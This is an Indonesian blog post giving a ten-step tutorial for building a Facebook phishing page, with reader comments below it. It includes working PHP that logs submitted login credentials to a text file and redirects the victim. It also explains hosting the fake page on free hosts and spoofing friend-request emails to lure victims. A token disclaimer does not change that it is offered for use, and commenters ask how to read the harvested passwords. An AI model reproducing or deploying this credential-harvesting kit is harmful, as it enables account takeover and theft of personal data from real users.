Change Background


Saturday, July 30, 2011

10 Cara Mudah Bikin Phising Facebook│Menyadap UserID dan Password FB




Phising merupakan istilah yang diambil dari kata Fishing yang artinya Memancing.Phising didunia internet berarti memancing korban untuk mengunjungi halaman tertentu.Phising di Facebook berarti Hacker menggunakan segala cara untuk memancing anda agar mengunjungi halaman Facebook palsu (Fake Login Facebook).Phising Facebook merupakan cara yang paling sering digunakan dalam Facebook Hacking.
Cara Phising-nya antara lain:

1. Mengirim Email palsu
Intinya Hacker mengirim sebuat email kepada anda yang seolah-olah merupakan email dari Facebook dan anda diminta untuk mengunjungi sebuah link/url/alamat situs.
2. Melalui IM(internet messenger)
Misalnya Hacker masuk kesebuah room di YM(Yahoo Messenger) dan mempost sebuah link Facebook Palsu.
3. Melalui sebuah situs
misalnya :
a) Hacker membuat sebuah Blog dan memposting artikel menarik tentang Facebook dan mengarahkan anda ke halaman login Facebook palsu.
b) Dengan memberi komentar beserta link Facebook palsu diartikel sebuah situs
c) Hacker menggunakan situs² iklan baris gratis/non gratis untuk mem-post tulisan ajakan-nya. Dll

Berikut Cara Mudah Membuat Phising Facebook :
2. Klik Kanan >> View Page Source atau tekan CTRL + U
3. Copy semua kode yang ada disitu kemudian paste ke notepad
4. Tekan CTRL + F kemudian cari kata action=
5..Ubah.action="https://www.facebook.com/login.php?login_attempt=1menjadi action="next.php" .. Ubah juga method dari POST menjadi get

6. Simpan notepad ini dengan nama login.php 
7. Buat notepad baru kemudian isikan kode berikut
<?php
header("Location: http://www.Facebook.com/login.php ");
$handle = fopen("pass.txt", "a");
foreach($_GET as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>


Note: ubah http://www.Facebook.com/login.php menjadi alamat web yang anda inginkan


8. Simpan Dengan Nama next.php
9. Buat notepad baru lagi .. isikan dengan huruf L >> Kemudian simpan dengan nama pass.txt
10. Kemudian Upload ke tiga file tersebut "login.php, next.php, pass.txt" ke alamat free hosting misalnya  http://ripway.com,http://110mb.com, http://spam.com atau http://007sites.com. 

Langkah-langkah spoofing :
1. Copy content asli undangan pertemanan dari facebook. 
2. Edit hyperlink dari : "http:/www.facebook.com/n/?reqs.php"
3. Ganti dengan halaman phising anda, hal ini tidak akan merubah tampilan di content asli facebook tapi tetap mengarah ke halaman phising kamu. Phising siap dikirim ke korban kamu. 

Notice :
Semua yang anda pelajari dan yang anda lakukan secara otomatis sudah menjadi TANGGUNG JAWAB anda Sepenuhnya, Seluruhnya, dan Seutuhnya. So jadikan ini sebagai ilmu pengetahuan bukan untuk hacking facebook orang. 

Original posted by beberapa sumber & editan saya

│Semoga  Bermanfaat│

10 comments:

Anonymous said...

gan, nnti pass fb dan id yang kita hack melihat nya di mana ?

Anonymous said...

ka bisa bantu balikin akun fb yang di hack sama orang ga,,,klo bisa aku bayar ka,,tapi aku cuma tau emailnya aja,,,password emailnya udah di ganti

Anonymous said...

gan kok pada saat di free hosting daftarnya kok susah,...
ku coba semua yg bisa hnya yg di http://spam.com
tapi itu aja klo mau upload login.php, pass.txt, & next.php nya sulit, mlah masuknya upload resep....
gmn gan, mohon pencerahannya...
ku pngen tahu ini biar bisa nolongin orang yg ke-Hack...
mohon bntuannya gan...

Anonymous said...

gan kalo kita gk tau apanama binatang peliharaan gimana

Anonymous said...

ga muncul gan

Hacker Reborn said...

Gak Bisa Om !!!

Ngeliatnya Dimana ?

Anonymous said...

GAn pas langkah spooorfing

setia said...

om mau nanya nih cara bikin autolike pake token gimana ya?? ane mau bikin sendiri

miomioan bogor said...

Andai ada screnshoot nya Om.. mungkin sya ud berhasil

Anonymous said...

Reyjpd [url=http://hermeskelly.finniwolf.com][b]hermes birkin bag[/b][/url] hermes party http://hermeskelly.finniwolf.com Maosrc Bdmrwb hermes birkin

:10 :11 :12 :13
:14 :15 :16 :17
:18 :19 :20 :21
:22 :23 :24 :25
:26 :27 :28 :29
:30 :31 :32 :33
:34 :35 :36 :37
:38 :39 :40 :41
:42 :43 :44 :45
:46 :47 :48 :49
:50 :51 :52 :53
:54 :55 :56 :57
:58 :59 :60 :61
:62 :63

Post a Comment

Silahkan beri komentar karena setiap komentarmu akan sangat berarti sekali buat saya dan blog agar bisa menjadi lebih baik untuk kedepannya dan jangan komentar spam ya jika komentarmu spam Shinigami akan menghukummu xixixii.. ^^

NB:
[L]Jika belum saya balas berarti saya masih sibuk,PM facebook saya saja
[L]Gabung juga ke grup │Shinigami WorLd│

│Terimakasih│